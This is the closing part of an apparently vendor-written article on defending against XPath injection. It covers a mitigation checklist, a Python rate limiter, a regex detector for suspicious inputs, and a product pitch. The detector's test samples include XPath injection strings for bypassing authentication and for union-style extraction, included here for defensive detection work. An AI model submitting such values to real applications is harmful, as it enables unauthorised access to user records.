Monitor for suspicious query patterns
Set up alerts for authentication anomalies
Regular security audits
Keep XML libraries updated
Implement rate limiting
Use Web Application Firewall (WAF)
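Rate limiting matters here because blind extraction needs a large number of requests. The following is a minimal in-process sketch of a sliding-window limiter. The class name, the limits, and the client identifier are assumptions for illustration; a production deployment would more likely enforce this in a shared store or at the gateway.

```python
import time
from collections import defaultdict, deque
from typing import Optional

class SlidingWindowLimiter:
    """Allow at most `limit` attempts per client within `window` seconds."""

    def __init__(self, limit: int = 5, window: float = 60.0):
        self.limit = limit
        self.window = window
        self._attempts = defaultdict(deque)

    def allow(self, client_id: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        attempts = self._attempts[client_id]
        # Drop attempts that have aged out of the window.
        while attempts and now - attempts[0] >= self.window:
            attempts.popleft()
        if len(attempts) >= self.limit:
            return False
        attempts.append(now)
        return True

limiter = SlidingWindowLimiter(limit=5, window=60.0)

# Eight login attempts, one per second, from the same (documentation-range) address.
results = [limiter.allow("203.0.113.7", now=float(t)) for t in range(8)]
# One more attempt after the earliest entries have left the window.
later = limiter.allow("203.0.113.7", now=61.0)

print(results)  # [True, True, True, True, True, False, False, False]
print(later)    # True
```

The `now` parameter exists only so the example is deterministic; real callers would omit it.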

# Key Takeaways

Critical Security Points

Never concatenate user input: Always use parameterized queries or manual iteration
Prefer alternative storage: Consider using proper databases instead of XML for sensitive data
Validate strictly: Use allowlist-based validation for all user inputs
Quote values safely: If concatenation is unavoidable, build string literals with concat() and reject special characters you do not need: ' " / [ ] ( ) @ * |
Hash passwords: Never store plaintext passwords in XML
Limit error messages: Don't reveal XPath syntax or structure in errors
Manual iteration is safest: When in doubt, iterate through nodes manually and compare strings
Defense in depth: Combine multiple protection layers (validation + escaping + monitoring)
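For the monitoring layer, a simple pattern check can flag inputs worth logging or alerting on. This sketch is illustrative only: the patterns are drawn from the payloads in this article, they are not exhaustive, and `looks_like_xpath_injection` is a hypothetical helper that should complement parameterized queries, never replace them.

```python
import re

# Patterns drawn from the payloads in this article; illustrative, not exhaustive.
SUSPICIOUS_PATTERNS = [
    # A quote followed by a boolean operator, as in: ' or '1'='1
    re.compile(r"'\s*(or|and)\s", re.IGNORECASE),
    # XPath function calls commonly used for blind extraction
    re.compile(r"\b(count|substring|string-length|name)\s*\(", re.IGNORECASE),
    # Closing a predicate and starting a union with a new path
    re.compile(r"\]\s*\|\s*/"),
    # Descendant axis appearing in user input
    re.compile(r"//\w"),
]

def looks_like_xpath_injection(value: str) -> bool:
    """Return True if the input resembles a known XPath injection payload."""
    return any(pattern.search(value) for pattern in SUSPICIOUS_PATTERNS)

for sample in ["Laptop", "O'Reilly Books", "admin' or '1'='1", "'] | //user[username='admin"]:
    print(sample, looks_like_xpath_injection(sample))
```

Expect false positives (a pasted URL contains `//`, for instance), which is why a check like this suits alerting better than blocking.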

# How Layerd AI Protects Against XPath Injection

Layerd AI provides comprehensive XPath injection protection:

Automatic Input Sanitization: Detects and escapes XPath special characters in all inputs
Query Pattern Analysis: Identifies malicious XPath syntax and boolean conditions
Authentication Monitoring: Alerts on suspicious login attempts and bypass patterns
XML Security Scanning: Analyzes XML data storage for security best practices
Real-time Blocking: Prevents XPath injection attempts before they reach your XML database
Code Analysis: Scans application code for vulnerable XPath query construction

Secure your XML data with Layerd AI's intelligent XPath injection protection.

Last Updated: November 2025